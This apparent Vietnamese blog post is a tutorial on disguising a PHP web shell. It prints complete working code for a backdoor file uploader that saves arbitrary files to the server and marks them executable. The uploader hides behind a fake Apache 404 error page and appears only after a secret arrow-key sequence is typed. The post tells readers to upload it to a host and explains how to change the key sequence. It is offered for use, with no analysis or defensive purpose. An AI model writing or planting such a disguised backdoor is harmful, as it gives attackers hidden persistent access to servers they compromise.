Hướng dấn ngụy trang shell độc đáo

0

Các bạn tạo một file shell php có nội dung như sau

 

<?php
if(isset($_FILES[“File”]))
{
define(“DS”,DIRECTORY_SEPARATOR);
echo “<body style=’background:#000;color:#66ff00′>”;
$Path=explode(DS,__FILE__);
unset($Path[count($Path)-1]);
$Path=implode(DS,$Path);
$Path.=DS.$_FILES[“File”][“name”];
if ($_FILES[“File”][“error”] > 0)
{
echo “Error: ” . $_FILES[“File”][“error”] . “<br />”;
}
else if(move_uploaded_file($_FILES[“File”][“tmp_name”],$Path))
{
echo “Stored in: ” .$Path;
@chmod($Path,0755);
}
echo “</body>”;
exit;
}
?>
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>404 Not Found</title>
<script type=”text/javascript” src=”http://code.jquery.com/jquery-1.8.1.min.js”></script>
<script type=”text/javascript”>
$(document).ready(function(){
var password=”[left][right][left][right][up][down]”;
var passwordType=””;
$(‘body’).keydown(function(e) {
if(passwordType==”[END]”){return false;}
switch(eval(e.which))
{
case 37:{
passwordType+=”[left]”;
break;
}
case 38:{
passwordType+=”[up]”;
break;
}
case 39:{
passwordType+=”[right]”;
break;
}
case 40:{
passwordType+=”[down]”;
break;
}
default:{
passwordType+=””;
break;
}
}
if(passwordType.indexOf(password)>=0)
{
passwordType=”[END]”;
$(“body”).fadeOut(1000,function(){
$(“body”).css({“background”:”#000000″,”color”:”#66 ff00″});
$(“body”).fadeIn(1000,function(){
$(“body h1”).fadeOut(500,function(){
$(“body h1”).html(“Welcome back, my Hacker !”);
$(“body h1”).fadeIn(500);
$(“body p”).eq(0).fadeOut(500,function(){
$(this).html(“<form method=’post’ enctype=’multipart/form-data’>Select file to upload: <input type=’file’ name=’File’/><input type=’submit’/>”);
$(this).fadeIn(500);
$(“title”).html(“Hacked !!!!”);
$(“p”).eq(1).html(“”);
$(“address”).html(“Coded by Hacker Anonymous Viet Nam !”);
});
});
});
});
}
});
});
</script>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?=$_SERVER[‘REQUEST_URI’]?> was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_qos/9.74 mod_bwlimited/1.4 Server at <?=$_SERVER[‘SERVER_NAME’]?> Port 80</address>
</body></html>

 

Up load file lên host và chạy, các bạn sẽ nhận được một trang lỗi 404 Not Found, bình tĩnh và bấm lần lượt các phím [trái] [phải] [trái] [phải] [lên] [xuống]

Các bạn cũng có thể chỉnh lại mật khẩu với các lệnh [left][up][right][down]

var password=”[left][right][left][right][up][down]”

Leave A Reply

Your email address will not be published.